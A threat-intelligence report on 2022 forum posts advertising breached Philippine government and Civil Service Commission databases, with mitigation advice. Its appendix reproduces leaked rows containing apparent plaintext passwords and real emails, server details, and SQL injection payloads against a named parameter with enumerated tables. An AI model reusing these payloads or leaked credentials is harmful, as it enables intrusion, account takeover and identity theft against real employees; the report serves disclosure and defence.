Philippines Government and Civil Service Commission Data Exposed in May 2022

Originally published at: https://cloudsek.com/philippines-government-and-civil-service-commission-data-exposed-in-may-2022/

Threat actors targeted the Philippines Government in May 2022 in cyberattacks, and sensitive Government data was exposed. CloudSEK’s contextual AI digital risk platform XVigil discovered a post on a cybercrime forum, advertising compromised data containing sensitive information from the following databases:

  • Government
  • Civil Service Commission

Analysis and Attribution

Information from the Post

Government Data Breach

  • On 9 May 2022, a threat actor published the database of the Philippines Government for the domain https//dole[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Government Data Breach

 

  • The compromised database contains the following details.
Details Shared
Email:Password Combinations Employees
Managers Job Titles
Employee IDs Comments
Department Data Locations
DOB/Termination Dates Pay Rates/ Types

Civil Service Commission Data Breach

  1. By Database Breach
  • On 15 May 2022, a threat actor published the database of the Civil Service Commission of Philippines for the domain http://csc[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach

 

  • The threat actor dumped the website for users to share or download and use.
  • The Civil Service Commission (CSC) is the Central Personnel Agency of the Philippines Government, responsible for the policies, plans, and programs concerning all civil service employees.
  • The compromised data of total 19121 records includes the following details.
Details Shared
Employer ID City ID Department ID
Region ID Agency ID Type
Token Status Admin
Password Username Created Date and many more fields
  • The actor has also shared information about the system including backend details, DBMS, DBMS user, and hostname.
  • Apart from the Employee information other files such as the following were shared.
Other Files Shared
  • Inventory Logs
  • User Logs
  • User Database
  • Agency Accounts
  • MySQL Logins
  • PhpMyAdmin Dump
  • XAMPP Logins
  • Chat logs of employees have also been compromised and published
  • The actor also mentioned that the site is using plaintext passwords.
  • A threat actor mentioned that the data breached might be from the breach that happened in 2021.
  • However, the publishing threat actor replied that the 2021 breach consisted of sensitive user info without logins and the database was not provided.

By SQL Injection

  • On 15 May 2022, another threat actor on the cyber crime forum shared a similar post with most of the data probably being the same.
  • However, the data breach was performed by SQL Injection on https//csc[.]gov[.]ph, breaching around one million rows of employee information.
  • Another threat actor mentioned that there were unhashed plain text passwords.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection

 

Impact & Mitigation

Impact Mitigation
  • This sensitive information could be a large-scale risk, leading to exposing of critical government infrastructure.
  • It would equip malicious actors with details required to launch sophisticated ransomware attacks, exfiltrate data, and maintain persistence.
  • If the leaked data is not encrypted, it could enable account takeovers.
  • Commonly used passwords or weak passwords could lead to brute force attacks.
  • PII (Personally Identifiable Information) of the employees belonging to the Government can be used to conduct:
    • Social engineering attacks
    • Phishing attacks
    • Identity theft
  • Scan repositories to identify exposed credentials and secrets.
  • Monitor cybercrime forums for the latest tactics employed by threat actors.
  • Reset the compromised user login credentials and implement a strong password policy for all user accounts.
  • Patch vulnerable and exploitable endpoints.
  • Monitor for anomalies in user accounts, which could indicate possible account takeovers.
  • Audit and monitor all logs of events and incidents to identify unusual patterns and behaviors.

Appendix

2888,1688,2198,32,2991,HRMO,0f87f298,1,1,Zos!J|*z8t#T]wT,asisthrmomaincampus@yahoo.com,2015-11-07 06:38:29,2019-06-26 09:49:03,Main Office,ABRA STATE INSTITUTE OF SCIENCE AND TECHNOLOGY,cscro14psed@yahoo.com

155,133,3293,28,4277,HRMO,9e729eda,1,1,Zo2cU $#T1PYNMv,abulugwaterdistrict@gmail.com,2016-01-08 15:15:13,2020-07-28 14:11:40,Water district,ABULUG WATER DISTRICT (CAGAYAN),csccbfo@gmail.com

2177,995,3019,39,3523,HRMO,b9d8057e,1,1,6!G%FI^,ruth_sacred@yahoo.com,2015-10-28 08:13:06,2020-05-04 11:04:38,SUC,AGUSAN DEL SUR STATE COLLEGE OF AGRICULTURE AND TECHNOLOGY,cscxiiiagusanfo@gmail.com

514,754,2940,37,4379,HRMO,da4541c6,1,1,”; ,}-cNJM;:^*W2″,ajuy_wd@gmail.com,2016-01-15 12:21:10,2020-07-09 06:42:36,<blank>,AJUY WATER DISTRICT,cscro6@gmail.com

515,701,2245,37,2545,HRMO,ee4cd846,1,1,3KBZUdn]56RSj#p,sucasu.aklan@gmail.com,2015-11-05 10:59:42,2020-03-13 18:32:14,State College and University,AKLAN STATE UNIVERSITY,root

1647,1411,2720,30,2937,HRMO,f0e0b728,1,1,:6/wJD)c*EHPMx<,rbcunanan@amanahbank.gov.ph,2015-11-06 16:16:56,2020-06-25 11:52:48,Executive Office,AL-AMANAH ISLAMIC INVESTMENT BANK OF THE PHILIPPINES,cscdbp_fo@yahoo.com.ph

153,418,2474,34,628,HRMO,6a5f9bad,1,1,Z7ReJGdnjw|_;Lx,alaminoslagunawaterdistrict@yahoo.com,2015-10-27 09:23:52,2020-07-09 06:31:47,Water District,ALAMINOS WATER DISTRICT (LAGUNA),admin@csc.gov.ph

System Information:

Quote:

Backend System: Windows 10

DBMS: MySQL 5.5

Hostname: WIN-NEJB836KBNF

DBMS User: ‘jmonses@localhost’

Info Provided:

Quote:

Inventory Logs

User Logs

User Database

Agency Accounts

MySQL Logins

PhpMyAdmin Dump

XAMPP Logins

FreiChat Chat Logs

Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)

And More

File Structure:

Quote:

.

|– cdcol

| `– cds.csv

|– csc_cdris

| |– tblref_subcat.csv

| |– tblref_subcat_topic.csv

| |– tblref_topic.csv

| |– tblresource_master.csv

| |– tblusers.csv

| |– vw_resource_master.csv

| |– vw_subcat_category.csv

| `– vw_subcat_topics.csv

|– csc_guestchat

| |– frei_banned_users.csv

| |– frei_chat.csv

| |– frei_config.csv

| |– frei_groupchat.csv

| |– frei_rooms.csv

| |– frei_session.csv

| |– frei_smileys.csv

| |– frei_video_session.csv

| |– frei_video_session.csv.1

| |– frei_webrtc.csv

| `– frei_webrtc.csv.1

|– csc_ighrsdb

| |– ref_2020inventorysummary.csv

| |– ref_2021inventorysummary_asof_aug16.csv

| |– tbl_agencyaccounts.csv

| |– tbl_agencyinventory_logs.csv

| |– tbl_personnel2.csv

| |– tbl_plantilla_jocos.csv

| |– tbl_userlogs.csv

| |– vw_agencyinventory_logs.csv

| |– vw_cscfoaccounts.csv

| `– vw_plantilla_sec_uploading_count.csv

|– csc_ighrsdb_aug312020

|– mysql

| `– user.csv

|– performance_schema

| `– accounts.csv

|– phpmyadmin

| |– pma_bookmark.csv

| |– pma_column_info.csv

| |– pma_designer_coords.csv

| |– pma_history.csv

| |– pma_pdf_pages.csv

| |– pma_recent.csv

| |– pma_relation.csv

| |– pma_table_coords.csv

| |– pma_table_info.csv

| |– pma_table_uiprefs.csv

| |– pma_tracking.csv

| |– pma_userconfig.csv

| `– pma_userconfig.csv.1

`– webauth

`– user_pwd.csv

9 directories, 46 files

Data Sample by SQL Injection

DBs Contain

– info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc..)

– agency account logins for IGHRS panel, can manage all data from that agency

– employee chat logs

bunch more you can see below

web server operating system: Windows

web application technology: PHP 5.5.9, Apache 2.4.7

back-end DBMS: MySQL >= 5.5

Parameter: aid (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: aid=3094 AND 4076=4076

Type: error-based

Title: MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Payload: aid=3094;SELECT SLEEP(5)#

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)– –

Database: information_schema

+—————————————————-+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_PER_INDEX |

| INNODB_CMP_PER_INDEX_RESET |

| INNODB_CMP_RESET |

| INNODB_FT_BEING_DELETED |

| INNODB_FT_CONFIG |

| INNODB_FT_DEFAULT_STOPWORD |

| INNODB_FT_DELETED |

| INNODB_FT_INDEX_CACHE |

| INNODB_FT_INDEX_TABLE |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_METRICS |

| INNODB_SYS_COLUMNS |

| INNODB_SYS_DATAFILES |

| INNODB_SYS_FIELDS |

| INNODB_SYS_FOREIGN |

| INNODB_SYS_FOREIGN_COLS |

| INNODB_SYS_INDEXES |

| INNODB_SYS_TABLES |

| INNODB_SYS_TABLESPACES |

| INNODB_SYS_TABLESTATS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| OPTIMIZER_TRACE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+—————————————————-+

Database: cdcol

+—————————————————-+

| cds |

+—————————————————-+

Database: csc_cdris

+—————————————————-+

| chat |

| tblchat |

| tblmember |

| tbloffice |

| tblref_author |

| tblref_category |

| tblref_subcat |

| tblref_subcat_topic |

| tblref_topic |

| tblref_type |

| tblresource_master |

| tblusers |

| vw_resource_master |

| vw_subcat_category |

| vw_subcat_topics |

| vw_type_category |

| vw_user_accomplishment |

| vw_user_accomplishment_withtype |

+—————————————————-+

Database: csc_guestchat

+—————————————————-+

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

+—————————————————-+

Database: performance_schema

+—————————————————-+

| accounts |

| cond_instances |

| events_stages_current |

| events_stages_history |

| events_stages_history_long |

| events_stages_summary_by_account_by_event_name |

| events_stages_summary_by_host_by_event_name |

| events_stages_summary_by_thread_by_event_name |

| events_stages_summary_by_user_by_event_name |

| events_stages_summary_global_by_event_name |

| events_statements_current |

| events_statements_history |

| events_statements_history_long |

| events_statements_summary_by_account_by_event_name |

| events_statements_summary_by_digest |

| events_statements_summary_by_host_by_event_name |

| events_statements_summary_by_thread_by_event_name |

| events_statements_summary_by_user_by_event_name |

| events_statements_summary_global_by_event_name |

| events_waits_current |

| events_waits_history |

| events_waits_history_long |

| events_waits_summary_by_account_by_event_name |

| events_waits_summary_by_host_by_event_name |

| events_waits_summary_by_instance |

| events_waits_summary_by_thread_by_event_name |

| events_waits_summary_by_user_by_event_name |

| events_waits_summary_global_by_event_name |

| file_instances |

Database: phpmyadmin

+—————————————————-+

| pma_bookmark |

| pma_column_info |

| pma_designer_coords |

| pma_history |

| pma_pdf_pages |

| pma_recent |

| pma_relation |

| pma_table_coords |

| pma_table_info |

| pma_table_uiprefs |

| pma_tracking |

| pma_userconfig |

+—————————————————-+

Database: webauth

+—————————————————-+

| user_pwd |

+—————————————————-+

Database: csc_ighrsdb

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| ref_2020dashboardsummary |

| ref_2020inventorysummary |

| ref_2021dashboardsummary |

| ref_2021inventorysummary |

| ref_2021inventorysummary_asof_aug16 |

| ref_2021inventorysummary_byage_mar2021 |

| ref_2021plantilapersonnel_asofaug312021 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_byage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_plantilla_dtl_rpt_age |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_agencyinventory_summary4_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_personnel_manager |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: mysql

+—————————————————-+

| user |

| columns_priv |

| db |

| event |

| func |

| general_log |

| help_category |

| help_keyword |

| help_relation |

| help_topic |

| innodb_index_stats |

| innodb_table_stats |

| ndb_binlog_index |

| plugin |

| proc |

| procs_priv |

| proxies_priv |

| servers |

| slave_master_info |

| slave_relay_log_info |

| slave_worker_info |

| slow_log |

| tables_priv |

| time_zone |

| time_zone_leap_second |

| time_zone_name |

| time_zone_transition |

| time_zone_transition_type |

+—————————————————-+

| file_summary_by_event_name |

| file_summary_by_instance |

| host_cache |

| hosts |

| mutex_instances |

| objects_summary_global_by_type |

| performance_timers |

| rwlock_instances |

| session_account_connect_attrs |

| session_connect_attrs |

| setup_actors |

| setup_consumers |

| setup_instruments |

| setup_objects |

| setup_timers |

| socket_instances |

| socket_summary_by_event_name |

| socket_summary_by_instance |

| table_io_waits_summary_by_index_usage |

| table_io_waits_summary_by_table |

| table_lock_waits_summary_by_table |

| threads |

| users |

+—————————————————-+

Database: csc_ighrsdb_aug312020

+—————————————————-+

| female_names |

| female_names_copy |

| frei_banned_users |

| frei_chat |

| frei_config |

| frei_groupchat |

| frei_rooms |

| frei_session |

| frei_smileys |

| frei_video_session |

| frei_webrtc |

| male_names |

| rpt_dashboardsummary_asof08312020 |

| rpt_dashboardsummary_asofjuly10 |

| rpt_dashboardsummary_asofjuly13 |

| rpt_inventorysummary_asof08312020 |

| rpt_inventorysummary_asofjuly10 |

| rpt_inventorysummary_asofjuly13 |

| tbl_agency_offices |

| tbl_agencyaccounts |

| tbl_agencyhrmo |

| tbl_agencyinventory |

| tbl_agencyinventory_archive |

| tbl_agencyinventory_logs |

| tbl_agencyinventory_plantilla |

| tbl_agencyinventory_plantilla_archive |

| tbl_agencyinventory_plantilla_withage |

| tbl_agencyinventory_tmp |

| tbl_branch_office |

| tbl_cscofficelookup |

| tbl_dashboardsummary |

| tbl_dashboardsummary_archive |

| tbl_dashboardsummary_plantilla |

| tbl_dashboardsummary_plantilla_archive |

| tbl_job_grade |

| tbl_personnel |

| tbl_personnel2 |

| tbl_personnel_uplink_errors |

| tbl_plantilla |

| tbl_plantilla_jocos |

| tbl_plantilla_jocos_copy |

| tbl_plantilla_jocos_hist |

| tbl_plantilla_logs |

| tbl_plantilla_mod_login |

| tbl_plantilla_ncareer |

| tbl_plantilla_ncareer_hist |

| tbl_plantilla_uplink_errors |

| tbl_plmonitoring_dump |

| tbl_pm_accessed |

| tbl_pos_annotations |

| tbl_position |

| tbl_resourcefile |

| tbl_salary_grade |

| tbl_salary_grade_2016 |

| tbl_salary_grade_2017 |

| tbl_salary_grade_2018 |

| tbl_salary_grade_2019 |

| tbl_salary_grade_2020 |

| tbl_seqref |

| tbl_servicecounter |

| tbl_settings |

| tbl_upload_interrupt |

| tbl_uploadfile |

| tbl_userlogs |

| tbl_version_update |

| tblref_agencyaddress |

| tblref_eligibility |

| tblusers |

| vw_agencyaccounts |

| vw_agencyhrmo_accts |

| vw_agencyinventory |

| vw_agencyinventory_archive |

| vw_agencyinventory_dtl_rpt |

| vw_agencyinventory_gender |

| vw_agencyinventory_logs |

| vw_agencyinventory_plantilla_dtl_rpt |

| vw_agencyinventory_rpt |

| vw_agencyinventory_summary |

| vw_agencyinventory_summary2 |

| vw_agencyinventory_summary3_plantilla |

| vw_cscfoaccounts |

| vw_cscroaccounts |

| vw_plantilla_noncareer |

| vw_plantilla_of_personnel |

| vw_plantilla_personnel |

| vw_plantilla_query |

| vw_plantilla_sec_uploading_count |

| vw_userlog_monthly |

| vw_userlogs |

+—————————————————-+

Database: csc_lookupdb

+—————————————————-+

| vw\x1f_agencymaster2 |

| agency_reference |

| area_reference |

| area_type_reference |

| district_reference |

| eligibility_reference |

| level_reference |

| municipality_reference |

| pos_status_reference |

| position_reference |

| position_reference_copy |

| position_reference_nongovt |

| province_reference |

| salary_grade_reference |

| status_reference |

| tbl_citylookup |

| tbl_cscofficelookup |

| tbl_eligibilitytype |

| tbl_examcenterlookup |

| tbl_zipcode |

| tbldibar_reflookup |

| tblref_agencydept |

| tblref_agencydept_nongovt |

| tblref_agencyhrmo |

| tblref_agencyro |

| tblref_agencysector |

| tblref_agencytype |

| tblref_bloodtype |

| tblref_citizenship |

| tblref_civilstatus |

| tblref_deptagency_tmp |

| tblref_educcourses |

| tblref_educlevel |

| tblref_educschool |

| tblref_empstatus |

| tblref_regions |

| tblref_religion |

| tblref_trainingprovider |

| tblref_trainingtitle |

| vw_agencyhrmo |

| vw_agencylookup |

| vw_agencymaster |

| vw_agencyromaster |

| vw_agencysector_type |

+—————————————————-+